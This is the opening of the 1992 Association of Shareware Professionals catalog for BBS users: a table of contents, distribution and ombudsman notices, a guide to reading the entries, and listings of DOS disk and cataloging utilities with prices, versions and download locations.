5.5 Freeform/text database managers . . . . . . 147 + 5.6 Keypunch programs . . . . . . . . . . . . . 148 + 5.7 Database utilities . . . . . . . . . . . . 148 + 5.8 Software tools . . . . . . . . . . . . . . 149 + 5.8.1 For multiple programs . . . . . . . . 149 + 5.8.2 For dBASE . . . . . . . . . . . . . . 149 + 5.8.2.1 dBASE III specific . . . . . . . 150 + 5.8.3 For FoxPro/FoxBASE+ . . . . . . . . . 152 + 5.8.4 For other . . . . . . . . . . . . . . 155 + 5.9 Other . . . . . . . . . . . . . . . . . . . 156 + + Chapter 6: Data 158 + 6.1 Words . . . . . . . . . . . . . . . . . . . 158 + 6.2 Mapping data . . . . . . . . . . . . . . . 158 + 6.3 Marketing data . . . . . . . . . . . . . . 158 + 6.3.1 Shareware specific . . . . . . . . . . 158 + 6.4 World facts . . . . . . . . . . . . . . . . 158 + 6.5 Area codes . . . . . . . . . . . . . . . . 158 + 6.6 Software tools . . . . . . . . . . . . . . 159 + 6.6.1 For other . . . . . . . . . . . . . . 159 + 6.7 Other . . . . . . . . . . . . . . . . . . . 160 + + Chapter 7: Communications 161 + 7.1 General purpose modem communications . . . 161 + 7.2 Service-specific programs . . . . . . . . . 162 + 7.2.1 For CompuServe . . . . . . . . . . . . 162 + 7.2.2 For GEnie . . . . . . . . . . . . . . 163 + 7.2.3 For Prodigy . . . . . . . . . . . . . 164 + 7.2.4 For MCImail . . . . . . . . . . . . . 164 + 7.3 Bulletin board software . . . . . . . . . . 164 + 7.3.1 Bulletin board utilities . . . . . . . 165 + 7.4 Call logging & analysis software . . . . . 165 + 7.4.1 Phone bill analyzers . . . . . . . . . 166 + 7.5 Modem-based graphics applications . . . . . 167 + 7.6 File format translators . . . . . . . . . . 167 + 7.7 File transfer protocols . . . . . . . . . . 168 + 7.8 Fax software . . . . . . . . . . . . . . . 168 + 7.9 Terminal emulators . . . . . . . . . . . . 169 + 7.10 Communication utilities . . . . . . . . . 169 + 7.11 Software tools . . . . . . . . . . . . . . 169 + 7.11.1 For multiple programs . . . . . . . . 169 + 7.11.2 For TAPCIS . . . . . . . . . . . . . 170 + 7.11.3 For Wildcat! . . . . . . . . . . . . 170 + 7.11.4 For PCBoard . . . . . . . . . . . . . 171 + 7.11.5 For Qmodem . . . . . . . . . . . . . 171 + 7.11.6 For other . . . . . . . . . . . . . . 171 + + iv + + + + 7.12 Other . . . . . . . . . . . . . . . . . . 171 + + Chapter 8: Business 172 + 8.1 Business finances . . . . . . . . . . . . . 172 + 8.1.1 Business accounting . . . . . . . . . 173 + 8.1.2 Point-of-sale systems . . . . . . . . 182 + 8.1.3 Billing systems . . . . . . . . . . . 186 + 8.1.4 Purchase order systems . . . . . . . . 190 + 8.1.5 Payroll systems . . . . . . . . . . . 190 + 8.2 Inventory systems . . . . . . . . . . . . . 192 + 8.3 Equipment use & maintenance . . . . . . . . 195 + 8.4 Project bidding & costing . . . . . . . . . 196 + 8.4.1 Decision analysis tools . . . . . . . 197 + 8.5 Project management . . . . . . . . . . . . 198 + 8.6 Client management . . . . . . . . . . . . . 200 + 8.7 Specific-field systems . . . . . . . . . . 202 + 8.7.1 Medical & dental . . . . . . . . . . . 202 + 8.7.2 Real estate . . . . . . . . . . . . . 204 + 8.7.3 Library . . . . . . . . . . . . . . . 204 + 8.7.4 Legal & law enforcement . . . . . . . 205 + 8.8 Forms generators . . . . . . . . . . . . . 205 + 8.8.1 Forms fillers . . . . . . . . . . . . 206 + 8.8.2 Forms processing . . . . . . . . . . . 207 + 8.8.3 Forms collections . . . . . . . . . . 208 + 8.9 Sales aids . . . . . . . . . . . . . . . . 208 + 8.10 Marketing . . . . . . . . . . . . . . . . 209 + 8.11 Work-at-home . . . . . . . . . . . . . . . 211 + 8.12 Training aids . . . . . . . . . . . . . . 211 + 8.13 Business utilities . . . . . . . . . . . . 211 + 8.14 Software tools . . . . . . . . . . . . . . 212 + 8.14.1 For other . . . . . . . . . . . . . . 212 + 8.15 Other . . . . . . . . . . . . . . . . . . 214 + + Chapter 9: Finances 215 + 9.1 Stock trading & analysis . . . . . . . . . 215 + 9.2 Personal finances . . . . . . . . . . . . . 218 + 9.2.1 Finances & budgets . . . . . . . . . . 220 + 9.2.2 Checkbook managers . . . . . . . . . . 228 + 9.3 File format translators . . . . . . . . . . 229 + 9.4 Portfolio management . . . . . . . . . . . 230 + 9.5 Finance utilities . . . . . . . . . . . . . 231 + 9.6 Other . . . . . . . . . . . . . . . . . . . 231 + + Chapter 10: Engineering 233 + 10.1 Industrial engineering . . . . . . . . . . 233 + 10.2 Electrical engineering . . . . . . . . . . 249 + 10.3 Civil engineering . . . . . . . . . . . . 250 + 10.4 Structural analysis . . . . . . . . . . . 251 + 10.5 Numerical control . . . . . . . . . . . . 252 + 10.6 Engineering utilities . . . . . . . . . . 252 + 10.7 Software tools . . . . . . . . . . . . . . 252 + 10.7.1 For other . . . . . . . . . . . . . . 252 + 10.8 Other . . . . . . . . . . . . . . . . . . 253 + + v + + + + Chapter 11: Mathematics 254 + 11.1 General math . . . . . . . . . . . . . . . 254 + 11.2 Mandelbrot . . . . . . . . . . . . . . . . 255 + 11.3 Statistics . . . . . . . . . . . . . . . . 255 + 11.4 Mathematical utilities . . . . . . . . . . 258 + 11.5 Other . . . . . . . . . . . . . . . . . . 258 + + Chapter 12: Programming 259 + 12.1 CASE tools . . . . . . . . . . . . . . . . 259 + 12.2 Desktop tools for programmers . . . . . . 259 + 12.3 Languages . . . . . . . . . . . . . . . . 261 + 12.3.1 Assembler . . . . . . . . . . . . . . 261 + 12.3.2 BASIC . . . . . . . . . . . . . . . . 261 + 12.3.3 C . . . . . . . . . . . . . . . . . . 263 + 12.3.3.1 C++ . . . . . . . . . . . . . . 268 + 12.3.4 Pascal . . . . . . . . . . . . . . . 269 + 12.3.4.1 OOP Pascal for DOS (Borland) . . 271 + 12.3.5 Other . . . . . . . . . . . . . . . . 272 + 12.4 'Make' utilities . . . . . . . . . . . . . 272 + 12.5 Hypertext/hypermedia . . . . . . . . . . . 273 + 12.6 Programming utilities . . . . . . . . . . 273 + 12.7 Software tools . . . . . . . . . . . . . . 275 + 12.7.1 For multiple programs . . . . . . . . 275 + 12.7.2 For other . . . . . . . . . . . . . . 275 + 12.8 Other . . . . . . . . . . . . . . . . . . 279 + + Chapter 13: Education 280 + 13.1 Preschool . . . . . . . . . . . . . . . . 280 + 13.2 Elementary . . . . . . . . . . . . . . . . 282 + 13.3 Junior high . . . . . . . . . . . . . . . 283 + 13.4 High school . . . . . . . . . . . . . . . 284 + 13.5 College . . . . . . . . . . . . . . . . . 286 + 13.6 Literature . . . . . . . . . . . . . . . . 288 + 13.7 Foreign language . . . . . . . . . . . . . 288 + 13.8 Computers . . . . . . . . . . . . . . . . 289 + 13.8.1 Operating system tutors . . . . . . . 290 + 13.8.2 Typing tutors . . . . . . . . . . . . 294 + 13.9 Teachers . . . . . . . . . . . . . . . . . 295 + 13.9.1 Gradebooks . . . . . . . . . . . . . 297 + 13.10 Science . . . . . . . . . . . . . . . . . 297 + 13.11 History . . . . . . . . . . . . . . . . . 298 + 13.12 Software tools . . . . . . . . . . . . . 299 + 13.12.1 For other . . . . . . . . . . . . . 299 + 13.13 Other . . . . . . . . . . . . . . . . . . 300 + + Chapter 14: Graphics 303 + 14.1 Viewing programs . . . . . . . . . . . . . 303 + 14.2 Drawing programs . . . . . . . . . . . . . 305 + 14.3 Paint programs . . . . . . . . . . . . . . 307 + 14.3.1 Graphics diversions . . . . . . . . . 308 + 14.4 Presentation graphics . . . . . . . . . . 308 + 14.5 CAD/CAM applications . . . . . . . . . . . 309 + 14.6 Business applications . . . . . . . . . . 310 + 14.6.1 OCR applications . . . . . . . . . . 310 + + vi + + + + 14.7 File format translators . . . . . . . . . 311 + 14.8 Tools & utilities . . . . . . . . . . . . 311 + 14.8.1 Screen capture . . . . . . . . . . . 312 + 14.9 Ready-made graphic images . . . . . . . . 312 + 14.9.1 Multi-format images . . . . . . . . . 312 + 14.9.2 PCX images . . . . . . . . . . . . . 313 + 14.10 Software tools . . . . . . . . . . . . . 313 + 14.10.1 For AutoCAD . . . . . . . . . . . . 313 + 14.11 Other . . . . . . . . . . . . . . . . . . 316 + + Chapter 15: Home & hobby 318 + 15.1 Astronomy . . . . . . . . . . . . . . . . 318 + 15.2 Collecting . . . . . . . . . . . . . . . . 318 + 15.3 Gardening . . . . . . . . . . . . . . . . 328 + 15.4 Household automation . . . . . . . . . . . 329 + 15.5 Movies & video tapes . . . . . . . . . . . 329 + 15.6 Personalities . . . . . . . . . . . . . . 332 + 15.7 Health . . . . . . . . . . . . . . . . . . 333 + 15.7.1 Food/dietary/kitchen . . . . . . . . 333 + 15.7.2 Exercise/fitness . . . . . . . . . . 335 + 15.8 Lottery . . . . . . . . . . . . . . . . . 336 + 15.9 Ham radio . . . . . . . . . . . . . . . . 338 + 15.10 Sports . . . . . . . . . . . . . . . . . 339 + 15.11 Scouting . . . . . . . . . . . . . . . . 342 + 15.12 Genealogy . . . . . . . . . . . . . . . . 344 + 15.13 Music . . . . . . . . . . . . . . . . . . 346 + 15.14 Fortune telling & astrology . . . . . . . 348 + 15.15 Planes, trains & automobiles . . . . . . 351 + 15.16 Software tools . . . . . . . . . . . . . 352 + 15.16.1 For other . . . . . . . . . . . . . 352 + 15.17 Other . . . . . . . . . . . . . . . . . . 352 + + Chapter 16: Religion & philosophy 356 + 16.1 The Bible . . . . . . . . . . . . . . . . 356 + 16.1.1 Bible programs . . . . . . . . . . . 356 + 16.1.2 Bible text . . . . . . . . . . . . . 356 + 16.2 Software for houses of worship . . . . . . 356 + 16.3 New age/occult . . . . . . . . . . . . . . 357 + 16.4 Philosophy . . . . . . . . . . . . . . . . 359 + 16.4.1 Metaphysics . . . . . . . . . . . . . 359 + 16.5 Software tools . . . . . . . . . . . . . . 359 + 16.5.1 For other . . . . . . . . . . . . . . 359 + + Chapter 17: Games 360 + 17.1 Practical jokes . . . . . . . . . . . . . 360 + 17.2 Jokes & humor . . . . . . . . . . . . . . 360 + 17.3 Sayings & stories . . . . . . . . . . . . 361 + 17.4 Board games . . . . . . . . . . . . . . . 361 + 17.4.1 Mahjong . . . . . . . . . . . . . . . 361 + 17.4.2 Other . . . . . . . . . . . . . . . . 362 + 17.5 Arcade games . . . . . . . . . . . . . . . 363 + 17.6 Card games . . . . . . . . . . . . . . . . 368 + 17.6.1 Poker . . . . . . . . . . . . . . . . 369 + 17.6.2 Solitaire . . . . . . . . . . . . . . 370 + + vii + + + + 17.7 Non-card games . . . . . . . . . . . . . . 372 + 17.8 Casino games . . . . . . . . . . . . . . . 372 + 17.9 War games . . . . . . . . . . . . . . . . 373 + 17.10 Simulators . . . . . . . . . . . . . . . 373 + 17.10.1 Sports . . . . . . . . . . . . . . . 375 + 17.11 Star Trek & Star Wars . . . . . . . . . . 376 + 17.12 Trivia . . . . . . . . . . . . . . . . . 377 + 17.13 Adventure . . . . . . . . . . . . . . . . 378 + 17.14 Word games . . . . . . . . . . . . . . . 380 + 17.14.1 Cryptanalysis . . . . . . . . . . . 385 + 17.15 Pinball/paddleball . . . . . . . . . . . 386 + 17.16 Strategy/simulation . . . . . . . . . . . 386 + 17.17 Puzzles, mix & match . . . . . . . . . . 389 + 17.18 For adults . . . . . . . . . . . . . . . 389 + 17.19 Software tools . . . . . . . . . . . . . 389 + 17.19.1 For other . . . . . . . . . . . . . 389 + 17.20 Other . . . . . . . . . . . . . . . . . . 390 + + Chapter 18: About shareware 392 + 18.1 Assn. Shareware Professionals . . . . . . 392 + 18.2 Other . . . . . . . . . . . . . . . . . . 396 + + Chapter 19: Other 397 + 19.1 Software tools . . . . . . . . . . . . . . 397 + 19.1.1 For multiple programs . . . . . . . . 397 + 19.1.2 For other . . . . . . . . . . . . . . 397 + 19.2 Other . . . . . . . . . . . . . . . . . . 397 + + Appendix A: Author addresses 399 + + Appendix B: Vendor addresses 436 + + Appendix C: Bulletin Boards 457 + + Appendix D: Retired shareware 473 + + Appendix E: Sorted list of all programs 474 + + Index 491 + + ASP Catalog for BBS Users 2 + + + + + + + + ASP Shareware Catalog for BBS users + nd th + 2 volume, 10 edition + Published April 2, 1992 + + Copyright 1992 by the Association of Shareware Professionals + (ASP), a non-profit organization; all rights reserved. Any + specific hardware/software names used in this catalog are the + (registered) trademarks of specific companies. Individuals, + bulletin board systems, national information systems, non-profit + organizations, and government agencies may freely distribute this + document in electronic form. For-profit disk vendor companies + may distribute this document in electronic form if they have an + ASP associate membership and if they charge only their normal + distribution fees. All others must obtain prior written per- + mission from the Association of Shareware Professionals. Write + to the ASP at 545 Grover Road, Muskegon, MI 49442. + + The programs & services described in this catalog come from + members of the Association of Shareware Professionals. This + catalog may not list every ASP-member product and it may not be + current. Send all comments about the catalog to the above + address, or to CompuServe userID 70007,4004, or as a message in + the CompuServe SHAREWARE forum. + + ASP strives to produce accurate catalogs BUT this publication may + contain any number of typographical, graphical, printing, or + interpretation errors. + + "These programs are produced by members of the Associa- + tion of Shareware Professionals (ASP). ASP wants to + make sure that the shareware principle works for you. + If you are unable to resolve a shareware-related problem + with an ASP member by contacting the member directly, + ASP may be able to help. The ASP Ombudsman can help you + resolve a dispute or problem with an ASP member, but + does not provide technical support for members' + products. Please write to the ASP Ombudsman at 545 + Grover Road, Muskegon, MI 49442 or send a Compuserve + message via Compuserve Mail to ASP Ombuds- + man 70007,3536". The Ombudsman may be contacted by FAX + by sending to the ASP FAX number: (616) 788-2765. In + communication with the Ombudsman please include a tele- + phone number and/or FAX if available. + + Please write to the ASP at the above address if you have any + comments or questions about this catalog. + + ASP Catalog for BBS Users 3 + + + + + + Chapter 1 + How to read this catalog + + ASP members have supplied product descriptions for each shareware + application they offer. The catalog groups them by subject + matter and lists them alphabetically. If you want to know the + name/address/phone for the author of a particular program, turn + to the index and look for the program by name. You'll usually + see two page references: one describes the page where you read + about the program, the other mentions the page where you can find + information about the author (in Appendix A). Just turn to the + appropriate page and scan for the name of the program. + + The Association of Shareware Professionals does NOT rate members' + software for functionality or usefulness, nor can it attest to + the validity of any product description in this catalog. That is + for you -- the user -- to decide. Shareware, especially those + products authorized to carry the ASP logo, can be tested on a + "try before you buy" basis. If the software doesn't meet your + needs, you won't have to worry about getting a refund. (That's + the beauty of the shareware marketing concept.) + + + 1.1 Minimum requirements + + Every program description lists its computer and operating system + requirements (e.g. "IBM PC, DOS 2.0 or better"). Unless noted + otherwise, each program assumes you have a standard keyboard, + monitor, printer, and either two floppy drives or a hard disk. + And unless noted otherwise, programs written for the IBM PC + assume you have at least 512k of total installed RAM. Many pro- + grams may also need specific hardware or software such as: + + CGA monitor A video monitor capable of displaying CGA + graphics. This includes most "laptop CGA" com- + puters, plus higher resolution monitors such as + the EGA or VGA. Some of the described programs + may operate correctly with a Hercules monitor if + you use a "CGA simulator" program; consult your + video monitor manual for details. + Dual 720k drives + At least two floppy drives capable of writing at + least 720k of data per disk, or, preferably, a + hard disk (see below). + EGA monitor A video monitor capable of displaying EGA + graphics. This almost always includes VGA and + other higher-resolution monitors. CGA and + Hercules monitors won't suffice. + Hard disk A fixed-, removeable-, or network-drive device + capable of storing multiple megabytes of data. + Some programs also assume you have at least one + floppy drive in addition to the hard disk. + + ASP Catalog for BBS Users 4 + + + + Hercules monitor + A video monitor capable of displaying Hercules + graphics. CGA monitors won't suffice. + HP DeskJet A Hewlett-Packard DeskJet or compatible printer. + Some programs may require a DeskJet starting with + a specific model such as the DeskJet Plus or + having a specific feature like a RAM cartridge. + HP LaserJet A Hewlett-Packard LaserJet or compatible printer. + (HP DeskJet printers recognize most, but not all, + of the HP LaserJet command set.) Some programs + may require a LaserJet either starting with a + specific model such as the LaserJet II or having a + specific feature like the LaserJet IIIDSi. + Modem A modem. Almost all programs work with a "Hayes" + modem, specifically one able to recognize the + Hayes command set (an industry standard). A few + programs claim to work with non-Hayes modems too. + Some programs may require the modem to operate at + a specific rate of speed (e.g. "1200 baud"). + Mouse A mouse. + Network A computer hooked up a local area network (LAN) + system. Program descriptions will normally + specify the different types of LAN systems under + which they can operate. + Plotter A plotter output device. Many of the described + programs need a plotter able to recognize the HPGL + (Hewlett Packard Graphics Language) command set. + PostScript printer + A printer able to interpret the PostScript(r) + command set. Many printers (including the HP + LaserJet series) offer PostScript compatibility + via plug-in cartridges. + VGA monitor A video monitor capable of displaying VGA + graphics. This almost always includes super-VGA + and other higher-resolution monitors. CGA/EGA/ + Hercules monitors won't suffice. + SVGA monitor + A video monitor capable of displaying Super-VGA + graphics. This almost always includes higher- + resolution monitors. CGA/EGA/VGA/Hercules + monitors won't suffice. + + + 1.2 Registration benefits + + All ASP member shareware products come with certain minimum + benefits when you register. The author must acknowledge your + registration (you don't just get a canceled check) and must + provide a minimum amount of technical support for at least three + months. + + ASP Catalog for BBS Users 5 + + + + Many authors provide other registration benefits such as a + printed manual, a master disk, a year of unlimited phone support, + source code, etc. The product description will mention them when + appropriate. + + In addition, every ASP member can offer the following benefits to + registered customers: + + CompuServe + IntroPak obtain an introductory membership to the Compu- + Serve network with a $15 usage credit when you + register an ASP member's shareware product. + Shareware + Magazine get a discount when you subscribe to Shareware + Magazine. + + Many authors include this information when they acknowledge + registrations. Contact the author if you need assistance. + + Some authors add "registration reminder screens" to the shareware + version of a program as a way to gently remind people to + register. (The ASP sets ethical standards regarding it.) Almost + all authors will either send a copy of the program without + reminder screens, or will disclose a method to disable the + reminders, once you register the product. + + + 1.3 Sample product description + + This sample description will help you understand what each field + means: + + Product: Shareware Program Name [***] + A "[***]" across from the product name indicates a new or + updated description since the last catalog. + Author: name & phone number of the person or company offering + this product. See Appendix A for detailed information about + the person or company. + Needs: computer type [IBM PC, IBM 80386, MacIntosh, etc.], + operating system, and version number. May also describe other + needed or optional hardware & software. See above for more + details. + Registration: The cost of a single user license, expressed in + U.S. currency unless otherwise noted. Many authors provide + "multi-tier" registrations, and you may pay a little more or + less than the amount stated here depending on your situation. + (You can sometimes save money by "reading the fine print.") + Some authors don't include shipping & handling fees in their + prices. Most authors offer network, site, and corporate + + ASP Catalog for BBS Users 6 + + + + licenses; please contact the author for specific details and + price quotes. + Version: version number (release date) + User benefits: Describes the benefits you get for registering + the software. All ASP shareware programs come with certain + minimum benefits; see above for details. + Look for: FILENAME.EXT (call xxx-xxx-xxxx to download it at no + charge); FNAME.EXT in GATE:FORUM forum LIB 9 on CompuServe; + FILENAME.EXT in ROUNDTABLE RTC LIB 9 on GEnie. + Download size: the size of the file(s) to download, in + kilobytes. A 2400 baud modem can download about 14 kilobytes + per minute under normal conditions. + Special instructions: tells if the author limits product + distribution to the United States. In some cases the author or + company may have signed a contract forbidding worldwide share- + ware distribution. In other cases the product may only appeal + to an American audience (income tax software for example). In + rare cases, U.S. federal laws may actually prohibit the author + or company from distributing the product in other countries. + Description: a paragraph or two of text which describes the + shareware product in detail. This information comes direct + from the author or company behind the program. + Editor's note: the catalog editor may append text of his own if + something needs further explanation. + + Chapter 2, "Utilities" 7 + + + + + + Chapter 2 + Utilities + + + 2.1 Disk utilities + + Product: BatchMaker Plus + Needs: IBM PC, DOS 3.0 or better. Hard disk, CGA monitor, 384k + RAM. + Author: Northland Multisoft, 818-963-6355 + Registration: $25.00 + Version: 2.5 (12-12-91) + User benefits: BatchMaker Plus package with a manual and the + latest version released. Independent copy of LCOPY for + transportability. Six months of support. + Look for: BTMK25.ZIP on BBSs. + Download size: 500k + Description: + FILE MENU - Menu of up to 500 files, Disk and computer info, + Calculator and calendar. DOS UTILITY - Double DIR DOS + manipulation, DIR tree, Disk and computer info, View files, + Display or change attribute, Execute program from list, Copy + large file to floppies. FILE EDITOR - Full screen editor, Quick + reference DOS help, Cut and paste, Locate function, Print + function, Make DIR to install program. DISK FUNCTIONS - Disk + commands with options. SETUP and LOAN & SAVINGS to get you + started, Mouse Support + + Product: Directory Freedom + Needs: IBM PC, DOS 3.0 or better. + Author: Bit Masons Consulting, 508-898-3321 + Registration: $20.00 + Version: 4.50 (12-05-91) + User benefits: Minimum 90 days phone/BBS/mail support. Printed + manuals, disks, and software subscription services available + for higher fees. + Look for: DF400.ZIP on BBSs (call 508-875-3618 to download it at + no charge); DF450.ZIP in IBMSYS forum LIB 5 on CompuServe. + Download size: 190k + Description: + Offers a fast, compact alternative to DOS Shells which provides + features such as selective file and directory operations; a + scrollable environment for examining files and directories; and + user-defined keys which can operate upon highlighted files. All + this in a program less than 25KB in size since it is written in + assembler! Easily customized through an external configuration + program. A great companion for systems of any size. + + Chapter 2, "Utilities" 8 + + + + Product: Directory-Manifest + Needs: IBM PC, DOS 3.0 or better. CGA monitor, 384k RAM. + Author: Northland Multisoft, 818-963-6355 + Registration: $15.00 + Version: 1.0 (12-22-91) + User benefits: Six months of support, plus a disk and a manual. + Look for: DIRMAN.ZIP on BBSs. + Download size: 200k + Description: + A Shell and Utility that includes disk and computer + information. A double directory DOS utility with a directory + tree, change attributes, copy large files beyond the capacity + of one diskette, view files even binary files, copy, rename, + erase, move, make and remove a directory, group copy or group + erase files. Execute files and print files from the directory + list. And more. All with mouse support. + + Product: Duplicate File Manager + Needs: IBM PC, DOS 3.0 or better. + Author: Micro System Solutions, 303-795-7653 + Registration: $27.00 + Version: 3.0 (09-01-91) + User benefits: Printed manual, phone support. + Look for: CUDUP3.EXE on BBSs (call 617-354-8873 to download it at + no charge); CUDUP3.EXE in IBMSYS forum LIB 6 on CompuServe. + Download size: 100k + Description: + Reads all files on up to 8 requested drives, optionally + includes files contained in compression libraries (ZIP, LHA, + LHARC, PAK, ZOO, ARC, MD, etc.) Provides full list, viewing and + file deletion capabilities. Duplicates listed as equals in + filename only, filename plus equals in any of the following: + size, date or time. + + Product: Flu_Shot+ + Virus Detection/Prevention via active monitor. See full + description on page 107. + + Product: FOURU + Needs: IBM PC, DOS 3.3 or better. EGA monitor. + Author: GTX Software, 213-257-2704 + Registration: $20.00 + Version: 2.0 (07-01-91) + User benefits: Free upgrades for one year. + Look for: FOURU.ZIP (multiple files) on BBSs (call 414-789-4532 + to download it at no charge); FOURU.ZIP in IBMSYS forum LIB 6 + on CompuServe. + Download size: 70k + Description: + Four Handy Utilities for your system. + DD.EXE A quick color coded directory lister. + FTREE.EXE Shows size of directories on your hard disk. + TO.EXE Change Drive/Directory quickly. + DFL.EXE Duplicate file finder. + + Chapter 2, "Utilities" 9 + + + + Product: Mover + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 2.11 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: MOVED211.ZIP on BBSs; MOVED2.ZIP in IBMSYS forum LIB 6 + on CompuServe. + Download size: 19k + Description: + Moves files between directories or disks. Fast, simple & + intuitive. Makes organizing your hard disk a snap. Options to + overwrite existing target files without asking, to delete + source files & to securely overwrite deleted source files. Much + faster than copying-then-deleting files. Works even on full + disks. + + Product: PC-INFO + Displays snapshot of system HW, SW & mem.dev. See full + description on page 71. + + Product: Room + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 2.11 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: ROOMD211.ZIP on BBSs; ROOMD2.ZIP in IBMHW forum LIB 1 + on CompuServe. + Download size: 8k + Description: + Tells much space is left on a disk & if there's room for a + specified set of files. Much faster & without the disk + thrashing of the DOS CHKDSK program. Find out how close you + are to filling up your disk. Use Room in a batch file to find + out if there's enough space on the disk before trying to copy + files on it. Room takes into account existing files by the + same name on the disk. + + Product: SAFEPACK [***] + Needs: IBM PC, DOS 2.0 or better. + Author: D J Harvey Software + Registration: $15.50 + Version: 1.1 (03-24-92) + User benefits: Next upgrade, two years of support. + Look for: SAFPAK11.ZIP on BBSs; SAFPAK.ZIP in IBMHW forum LIB 1 + on CompuServe. + Download size: 53k + Description: + This disk defragmenter for MSDOS up to 5.0 and DR DOS up to 6.0 + is designed so that the data on the disk should be immune to + any interruptions to the program, whether due to user + interrupt, machine failure, or even a power cut. + + Chapter 2, "Utilities" 10 + + + + Numerous options allow files and directories to be sorted into + almost any order, and many other optimizations are possible. It + may be run in unattended mode, allowing use in batch files. + + As it uses only high level calls, it should work on ANY + standard DOS Disk. + + Product: STRG String Processing Routines + Needs: IBM PC, DOS 1.0 or better. Turbo Pascal 5.0 or better. + Author: Eagle Performance Software, 214-539-7855 + Registration: $35.00 + Version: 6.1b (06-17-91) + User benefits: 260k of assembler source code and 75 .OBJ files, + which can recompile under any TP version from 4.0 to 6.0; + Voice, BBS and FAX technical support; $9 upgrade policy for new + versions. + Look for: STRG61B.ZIP on BBSs (call 214-539-9878 to download it + at no charge); STRG61.ZIP in BPROGA forum LIB 7 on CompuServe; + STRG61B.ZIP in BORLAND RTC LIB 3 on GEnie. + Download size: 48k + Description: + Extremely high speed string routines for strings, characters, + and all types of numbers, including case, classification, + comparison, conversion, copy, count, delete, format, + justification, membership, parse, position, replace, search, + sort, tabbing, ASCIIZ, many with match/ignore case and many + more! 111 routines fit in 6.3k or less. Most are much faster + than the string routines provided by Borland. Also available + for previous versions of Turbo Pascal -- contact us for more + information. + + 2.1.1 Disk cataloging + + Product: Disk Manager (CUDM) + Needs: IBM PC, DOS 3.0 or better. + Author: Micro System Solutions, 303-795-7653 + Registration: $47.00 + Version: 3.30 (08-01-91) + User benefits: Printed manual, master disks, phone support. + Look for: CUDM32.EXE on BBSs (call 617-354-8873 to download it at + no charge); CUDM32.EXE in IBMSYS forum LIB 9 on CompuServe. + Download size: 118k + Description: + Reads all sizes of disks (Floppies, Hard drives & CD-ROMs), + creates an on-disk catalog for your later use to find, list or + label your diskettes. Will produce labels for 5.25" or 3.5" + diskettes and listings in 3 formats. Support any display mode. + Will catalog over 50,000 files and will read compression + libraries such as .ZIP, .ARC, .LZH (both versions), .PAK, .LBR, + .ZOO, .MD and at your command will include them in your + catalog. + + Chapter 2, "Utilities" 11 + + + + Product: DISKLIST + Diskette Cover & Label Producer - 33 Formats. See full + description on page 24. + + Product: DiZk4D + Needs: IBM PC, DOS 2.1 or better. 4DOS, IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 3.03 (11-18-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: DZK4D303.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DIZK4D.ZIP in PCVENB forum LIB 10 on CompuServe. + Download size: 166k + Description: + The FIRST dizk catalog and labeling system created expressly + for 4DOS. Reads the dizk, lets you add a title, dizk number, + code, and 2 lines of remarks THEN you can add or update field + descriptions for each file! You can even choose to omit files + from the catalog. You can update the dizk files and transfer + descriptions. Prints 3 sizes and 2 styles of labels, listings, + catalogs, AND a complete files list. All print outs can be + sent to file. Performs searches on all fields or combination of + fields. + + Product: DiZkND + Needs: IBM PC, DOS 2.1 or better. Norton's NDOS. IBM Graphics + printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 2.11 (11-25-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: DZKND211.ZIP on BBSs (call 219-784-2147 to download it + at no charge); DIZKND.ZIP in IBMSYS forum LIB 9 on CompuServe. + Download size: 163k + Description: + The FIRST dizk catalog and labeling system created expressly + for NDOS. Reads the dizk, lets you add a title, dizk number, + code, and 2 lines of remarks THEN you can add or update field + descriptions for each file! You can even choose to omit files + from the catalog. You can update the dizk files and transfer + descriptions. Prints 3 sizes and 2 styles of labels, listings, + catalogs, AND a complete files list. All print outs can be + sent to file. Performs searches on all fields or combination of + fields. + + Chapter 2, "Utilities" 12 + + + + Product: FBNCAT + Needs: IBM PC, DOS 3.0 or better. 640k RAM, hard disk, one + floppy drive. + Author: FBN Software, 408-446-9039 + Registration: $25.00 + Version: 3.0 (11-01-90) + User benefits: Printed manual and most current version on disk, + Free support via CIS, GEnie, mail. + Look for: FBNCT3.EXE on BBSs; FBNCT3.EXE in IBMSYS forum LIB 9 on + CompuServe. + Download size: 154k + Description: + This disk catalog manager uses pull down menus and is fast and + simple to use. The user interface and easy of use is a major + strength of this program. Provides mouse support, configurable + printer support, ARC-ZIP-PAK-LZH archive support, prints labels + on dot matrix printers. + + Product: LJ-SLEEVE [***] + Print floppy storage sleeves on laserjets. See full + description on page 57. + + Product: OMNIDiZk + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 2.90 (11-25-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: ODIZK290.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ODIZK.ZIP in IBMSYS forum LIB 9 on CompuServe. + Download size: 142k + Description: + A complete dizk catalog and labeling system. Reads a dizk, + lets you add a title, dizk number, code, and 2 lines of remarks + THEN you can add a description to each file! You can even + choose to omit files from the catalog. You can update the dizk + files and transfer descriptions. Prints 3 sizes and 2 styles of + labels, listings, catalogs, AND a complete files list. All + print outs can be sent to file. Performs searches on all + fields or combination of fields. + + Chapter 2, "Utilities" 13 + + + + Product: PixFolio Image Catalog System + Needs: IBM AT (80286), Windows 3.0 or better. 256-color video + card and a video driver to display 256-color images. + Author: ACK Software, 502-955-7527 + Registration: $25.00 + Version: 1.03.6 (01-24-92) + User benefits: Phone & CompuServe support; free upgrade to next + major version. + Look for: PIXF13.ZIP on BBSs; PIXF13.ZIP in WINADV forum LIB 0 on + CompuServe. + Download size: 400k + Description: + Enables the user to maintain catalogs of the locations of + various graphics files. File formats supported include BMP, + PCX, GIF TIF, TGA, IFF/LBM, IMG, MAC, IMF, ICO/ICN Micrografx + DRW and EPS. Files can be saved in BMP, PCX, GIF, TGA, TIF and + IFF formats. + + Image manipulation tools include: rotate, mirror/flip, resize, + crop, cut & paste, palette matching, 